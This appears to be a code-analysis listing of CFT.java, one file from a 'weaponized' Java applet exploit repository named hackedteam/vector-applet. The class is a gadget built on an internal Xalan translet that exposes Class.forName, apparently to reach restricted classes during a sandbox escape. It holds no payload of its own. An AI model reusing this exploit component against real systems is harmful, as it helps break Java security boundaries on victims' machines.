hackedteam/vector-applet

View on GitHub
weaponized/src-exploit/x/CFT.java

Summary

Maintainability
A
0 mins
Test Coverage
package x;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class CFT extends AbstractTranslet {

    public CFT() {
        super.namesArray = new String[] { "x" };
        // Required to retrieve this instance from TransformerImpl.
        addParameter("x", this);
    }
    
    public Class<?> getClass(String name) throws ClassNotFoundException {
        return Class.forName(name);
    }
    
    @Override
    public void transform(DOM document, SerializationHandler[] handlers)
            throws TransletException {
        // Not needed
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator,
            SerializationHandler handler) throws TransletException {
        // Not needed
    }
    
}